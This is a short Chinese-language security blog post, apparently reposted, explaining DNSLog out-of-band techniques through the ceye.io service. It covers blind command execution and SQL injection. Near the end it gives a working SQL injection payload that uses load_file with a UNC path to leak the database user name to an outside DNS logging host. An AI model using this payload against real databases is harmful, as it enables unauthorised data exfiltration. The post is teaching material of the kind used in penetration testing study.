DNS log 学习

DNSLOG的原理

DNS的解析是递归与迭代相结合的，下面给出了当我们访问 www.o2oxy.cn 时.

最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一个NS 的DNS 就可以控制到解析

DNSLOG工具

如果有自己的服务器和域名，可以自建一个这样的平台，直接使用BugScan团队开源的工具搭建即可：

https://github.com/BugScanTeam/DNSLog

另外我们也可以使用在线平台：

http://ceye.io

此次用的是ceye.io

image

在浏览器访问一下

image image image

在记录中就可以查询到了。那么在其他方面可以利用吗？如下：

命令执行无回显的情况下：

image

然后在后台看看情况

image

发下是root 用户。

那么还有没有其他的利用方式呢？

有的。SQL 注入和其他漏洞也可以使用的

例子：SQL 注入

image

pyload:

select load_file(concat(‘\\’, user(), ‘.hfkzaq.ceye.io’))

转载于某位安全大佬的博客https://www.o2oxy.cn